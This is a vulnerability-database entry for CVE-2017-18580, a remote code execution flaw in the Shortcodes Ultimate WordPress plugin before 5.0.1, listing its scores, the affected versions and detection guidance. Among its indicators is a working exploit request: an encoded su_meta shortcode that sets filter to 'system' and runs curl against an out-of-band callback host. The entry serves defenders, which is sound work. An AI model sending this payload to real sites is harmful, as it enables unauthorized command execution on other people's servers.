cbcvebase.
CVE-2017-18580
published 2019-08-22

CVE-2017-18580: The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.

Priority: P1 82 critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 12.09% (95.6th percentile)

Affected

1 range

Vendor: getshortcodes
Product: shortcodes_ultimate
Version range: < 5.0.1
Fixed in: 5.0.1

Detection & IOCs (extracted from sources)

url: /wp-admin/post.php
command: action=editpost&post_ID={{post_id}}&post_status=draft&post_type=post&_wpnonce={{nonce}}&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+{{interactsh-url}}%27+filter%3D%27system%27%5D
url: /?p={{post_id}}&preview=true
  • Exploit uses the [su_meta] shortcode with a 'filter' parameter set to 'system' to achieve RCE. Detect POST requests to /wp-admin/post.php containing 'filter%3D%27system%27' (URL-encoded) or filter='system' (decoded) in the body.
  • The exploit targets the shortcodes-ultimate plugin before 5.0.1 for WordPress via a filter parameter in su_meta, su_post, or su_user shortcodes. Monitor for shortcode usage containing 'filter=' paired with PHP function names (e.g., system, exec, passthru) in post content.
  • Successful exploitation results in an HTTP 302 redirect with 'post=' in the Location header, followed by a GET preview request. Correlate a POST to /wp-admin/post.php (302 response with 'post=' header) with a subsequent GET to /?p=<id>&preview=true and outbound DNS/HTTP callback.
  • The exploit URL-encodes the malicious shortcode payload. Look for URL-encoded bracket sequences '%5B' and '%5D' wrapping 'su_meta', 'su_post', or 'su_user' in POST body to /wp-admin/post.php.
  • The CVE affects shortcodes-ultimate plugin versions strictly before 5.0.1. Ensure the installed plugin version is checked; version 5.0.1 and later are patched.
  • The PoC uses an out-of-band (OOB) DNS/HTTP callback via interactsh to confirm RCE. Detection relying solely on response codes may produce false positives; OOB confirmation is required for high-confidence detection.

CVSS provenance

nvd (v3.0): 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd (v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck: 9.8 CRITICAL